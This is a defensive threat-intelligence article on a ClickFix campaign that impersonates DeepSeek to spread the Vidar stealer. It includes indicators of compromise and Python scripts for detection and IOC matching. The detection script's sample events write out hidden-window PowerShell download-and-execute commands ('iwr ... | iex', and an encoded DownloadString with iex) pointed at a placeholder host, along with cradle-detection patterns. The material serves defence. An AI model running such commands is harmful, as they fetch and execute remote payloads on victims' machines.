The rapid rise of generative AI tools has not only revolutionized industries but also opened new avenues for cybercriminals.
DeepSeek, whose R1 model was released on January 20, 2025 and whose chatbot app surged to the top of download charts in the days that followed, has become the latest brand to be exploited.
Threat actors are leveraging the chatbot’s popularity to deploy the Vidar information stealer malware through a series of fraudulent websites mimicking DeepSeek’s branding.
These campaigns rely on brand impersonation: look-alike domains dressed in DeepSeek’s branding trick users into running the malware themselves, so the initial compromise needs no exploit, only a convincing page.
The attack chain begins with users being lured to counterfeit DeepSeek-themed websites, such as “deepseekcaptcha[.]top,” which prompt them to complete a fake registration process.
Victims are then redirected to a fraudulent CAPTCHA page where malicious JavaScript silently writes a PowerShell command into their clipboard, the pattern commonly referred to as ClickFix.
Nothing runs at this point; the page relies on the victim pasting and executing that command themselves, and if they do, it downloads and launches the Vidar stealer.
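The paste-and-run step above leaves a distinctive trace in endpoint telemetry: a PowerShell process spawned by explorer.exe (the Run dialog), with a hidden window, an execution-policy bypass and a download cradle piped into Invoke-Expression. The following detection script is an added example for this article, not code from the original post or from ThreatLabz. It scores constructed process-creation events modelled on Sysmon Event ID 1 / Windows 4688 fields, decodes any -EncodedCommand payload so the base64 blob is scored by its contents rather than its appearance, and alerts when the score reaches a threshold. The sample events, the 203.0.113.10 host and the rule weights are all constructed for illustration.

```python
"""Heuristic detection of ClickFix-style PowerShell launches.

Added example for this article, not code from the original post or from
ThreatLabz. It scores process-creation events for the traits the campaign
above depends on: a hidden window, an execution-policy bypass, a download
cradle piped into Invoke-Expression, and a launch from explorer.exe, which
is the parent when a victim pastes into the Win+R Run dialog. -EncodedCommand
payloads are decoded and scored in place of the base64 blob. Every event and
the 203.0.113.10 host are constructed test data, not real indicators.
"""
import base64
import re

# Constructed events modelled on Sysmon Event ID 1 / Windows 4688 fields.
_ENC_PAYLOAD = 'iex (New-Object Net.WebClient).DownloadString("http://203.0.113.10/s")'
SAMPLE_EVENTS = [
    {   # ClickFix-style paste: hidden window, bypass, iwr | iex, from Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": 'powershell -w hidden -ep bypass -nop -c "iwr http://203.0.113.10/l.ps1 -UseBasicParsing | iex"',
    },
    {   # Same intent hidden behind -EncodedCommand (UTF-16LE, base64)
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell -nop -w hidden -enc "
                   + base64.b64encode(_ENC_PAYLOAD.encode("utf-16le")).decode(),
    },
    {   # Legitimate: management agent running a deployed script with bypass
        "parent": r"C:\Program Files\Mgmt\agent.exe",
        "cmdline": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {   # Legitimate: interactive admin use
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": "powershell Get-Service -Name Spooler",
    },
]

# (name, regex, weight); the download-and-execute core carries most weight.
RULES = [
    ("hidden_window", re.compile(r"-w\w*\s+(?:hidden|h|1)\b", re.I), 1),
    ("policy_bypass", re.compile(r"-e(?:p|xec\w*)\s+bypass\b", re.I), 1),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|net\.webclient|"
        r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
]
ENC_RE = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{20,})", re.I)
THRESHOLD = 4


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or "" if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event):
    """Score one event; returns (score, matched rule names)."""
    cmdline = event["cmdline"]
    hits, score, text = [], 0, cmdline
    m = ENC_RE.search(cmdline)
    if m:
        # Score the decoded payload in place of the base64 blob, whose
        # characters could otherwise trip the keyword rules by accident.
        hits.append("encoded_command")
        score += 1
        text = cmdline[:m.start()] + " " + decode_encoded_command(cmdline) + " " + cmdline[m.end():]
    for name, rx, weight in RULES:
        if rx.search(text):
            hits.append(name)
            score += weight
    # explorer.exe is the parent when the paste goes into the Run dialog.
    if event.get("parent", "").lower().endswith("\\explorer.exe"):
        hits.append("explorer_parent")
        score += 1
    return score, hits


def detect(events, threshold=THRESHOLD):
    """Return the command lines whose score reaches the alert threshold."""
    return [e["cmdline"] for e in events if score_event(e)[0] >= threshold]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        s, hits = score_event(e)
        print("ALERT" if s >= THRESHOLD else "ok   ", s, hits)
```

The two constructed malicious events score 7 and are flagged; the management agent's `-ExecutionPolicy Bypass -File` run scores only 1 and the interactive `Get-Service` scores 0, which is why the download cradle and Invoke-Expression carry double weight while a bare policy bypass does not.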
Technical Breakdown of the Attack Chain
The attack is meticulously designed to exploit user trust in DeepSeek’s brand.
Once the victim executes the malicious PowerShell command, a packed Vidar executable is downloaded and run on their system.
Vidar then initiates its primary objective: harvesting sensitive data such as cryptocurrency wallet credentials, browser cookies, saved passwords, and personal files.
The malware also leans on legitimate platforms, Telegram and Steam, for its command-and-control (C2) setup: the sample carries hardcoded URLs for a Telegram channel and Steam community profiles and reads the address of the live C2 server from the text on those pages, a dead-drop technique that lets the operators rotate servers without redeploying the binary and hides the lookup in ordinary traffic to popular sites.
Stolen data is then exfiltrated to the attacker-controlled server that the dead drop points to.
Targeted Data and Techniques
Vidar’s configuration in this campaign is tailored to target cryptocurrency wallets and browser-related assets.
It scans for files associated with popular wallets like MetaMask, BinanceChainWallet, and Trust Wallet, among others.
Additionally, it searches browser directories for saved credentials and autofill data from platforms like Google Chrome, Microsoft Edge, Brave Browser, and Mozilla Firefox.
The malware also uses filename-based targeting, searching for files whose names contain keywords such as wallet, seed, crypto, or password.
This catches seed phrases, exported keys and credential notes stored outside any known application path, so high-value data is picked up even when it is not in a location Vidar already knows about.
ThreatLabz researchers have identified several indicators of compromise (IOCs) associated with this campaign:
- Fake domains: deepseekcaptcha[.]top
- C2 IP addresses: 77.239.117[.]222, 95.216.178[.]57
- Telegram channel: t[.]me/b4cha00
- Packed Vidar sample hash: 9f680720826812af34cbc66e27e0281f
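Indicators published in defanged form have to be refanged before they are useful, and matching them against logs has boundary pitfalls: a domain should match its subdomains but not a longer look-alike that happens to end in the same string, an IP should match only as a whole address, and hashes arrive in mixed case. The script below is an added example for this article, not ThreatLabz tooling. It takes the IOCs exactly as listed above, refangs them, and checks constructed DNS, proxy and file-hash records against them with those boundaries enforced. The log lines are constructed; the 192.0.2.x and 198.51.100.x addresses are documentation-range placeholders, not real hosts.

```python
"""Match the campaign IOCs listed above against constructed log samples.

Added example for this article, not ThreatLabz tooling. It refangs the
defanged indicators exactly as the page lists them, then checks DNS,
proxy and file-hash records against them with correct boundaries: a
domain IOC matches itself and its subdomains but not a look-alike that
merely ends in the same string, an IP matches only as a whole address,
a Telegram channel matches on host plus path, and an MD5 matches
regardless of case. All log lines are constructed; 192.0.2.x and
198.51.100.x are documentation-range placeholders, not real hosts.
"""
import re
from urllib.parse import urlparse

RAW_IOCS = {  # as published, defanged
    "domains": ["deepseekcaptcha[.]top"],
    "ips": ["77.239.117[.]222", "95.216.178[.]57"],
    "telegram": ["t[.]me/b4cha00"],
    "md5": ["9f680720826812af34cbc66e27e0281f"],
}


def refang(value):
    """Undo common defanging ([.], (.), \\., hxxp://, [:]) for comparison."""
    v = value.replace("[.]", ".").replace("(.)", ".").replace("\\.", ".")
    v = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("xx", "tt"), v, flags=re.I)
    return v.replace("[:]", ":").lower()


IOCS = {kind: [refang(v) for v in values] for kind, values in RAW_IOCS.items()}

# Constructed DNS log: timestamp client qtype qname
DNS_LOG = [
    "2025-02-03T10:01:02Z 192.0.2.10 A deepseekcaptcha.top",
    "2025-02-03T10:01:09Z 192.0.2.10 A cdn.deepseekcaptcha.top",     # subdomain: hit
    "2025-02-03T10:02:00Z 192.0.2.11 A notdeepseekcaptcha.top",      # suffix look-alike: no hit
    "2025-02-03T10:03:00Z 192.0.2.12 A t.me",                          # platform only: no hit
]
# Constructed proxy log: timestamp client dst_ip dst_port url
PROXY_LOG = [
    "2025-02-03T10:05:00Z 192.0.2.10 77.239.117.222 80 http://77.239.117.222/",
    "2025-02-03T10:05:30Z 192.0.2.10 177.239.117.222 443 https://177.239.117.222/",  # superstring: no hit
    "2025-02-03T10:06:00Z 192.0.2.10 198.51.100.5 443 https://t.me/b4cha00",
    "2025-02-03T10:06:10Z 192.0.2.13 198.51.100.5 443 https://t.me/b4cha001",          # different channel: no hit
]
# Constructed file inventory: (path, md5)
HASHES = [
    (r"C:\Users\u\Downloads\update.exe", "9F680720826812AF34CBC66E27E0281F"),  # upper case: hit
    (r"C:\Users\u\Downloads\notes.txt", "d41d8cd98f00b204e9800998ecf8427e"),
]


def domain_matches(hostname, ioc_domain):
    """True for the domain itself or any subdomain, never for a longer label."""
    h = hostname.lower().rstrip(".")
    return h == ioc_domain or h.endswith("." + ioc_domain)


def url_matches(url, ioc_path):
    """Compare host plus path (no scheme, no trailing slash) against an IOC."""
    p = urlparse(url)
    return ((p.hostname or "") + p.path.rstrip("/")).lower() == ioc_path


def scan(dns_log=DNS_LOG, proxy_log=PROXY_LOG, hashes=HASHES, iocs=IOCS):
    """Return (record, indicator kind, indicator) for every match."""
    hits = []
    for line in dns_log:
        qname = line.split()[-1]
        hits += [(line, "domain", d) for d in iocs["domains"] if domain_matches(qname, d)]
    for line in proxy_log:
        _, _, dst_ip, _, url = line.split(maxsplit=4)
        if dst_ip in iocs["ips"]:
            hits.append((line, "ip", dst_ip))
        hits += [(line, "telegram", t) for t in iocs["telegram"] if url_matches(url, t)]
    for path, md5 in hashes:
        if md5.lower() in iocs["md5"]:
            hits.append((path, "md5", md5.lower()))
    return hits


if __name__ == "__main__":
    for record, kind, ioc in scan():
        print(f"{kind:8} {ioc:32} <- {record}")
```

Against the constructed data this yields five hits (the domain, its subdomain, one C2 IP, the Telegram channel and the sample hash) and correctly ignores the `notdeepseekcaptcha.top` look-alike, the `177.239.117.222` superstring and the `b4cha001` channel, which a naive substring search would have flagged.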
This campaign underscores how cybercriminals are quick to exploit emerging technologies like generative AI for malicious purposes.
The impersonation of DeepSeek highlights the risks posed by brand abuse in the digital age.
Organizations should pair user education with controls that break this chain: treat any web page that asks users to paste a command into a Run dialog or terminal as hostile, log PowerShell script blocks and process creation so such pastes can be detected, and monitor for the indicators above.
As AI adoption accelerates globally, vigilance against brand abuse of this kind becomes paramount.